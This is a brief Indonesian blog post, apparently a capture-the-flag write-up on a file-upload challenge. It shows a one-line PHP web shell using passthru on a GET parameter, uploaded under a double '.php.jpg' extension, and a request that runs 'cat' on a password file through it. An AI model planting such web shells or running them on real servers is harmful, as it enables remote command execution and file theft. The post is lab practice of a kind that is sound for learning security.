pertama saya membuat sebuah file php dengan format jpg kodenya seperti ini
<?php
passthru($_GET["cmd"]);
?>setelah itu save dengan nama.php.jpg, lalu anda upload dan setelah berhasil diupload buka link file imagenya.
selanjutnya melakukan cat pada passwd, seperti ini:
domain/web-serveur/ch20/galerie/upload/l918s3nuuf8ki45ktqqhk30h01/crot.php.jpg?cmd=cat ../../../.passwdmaka flag akan muncul.
NB: kenapa format php bisa diupload? itu terjadi karena kurang security dan filter saat proses upload.
No comments:
Post a Comment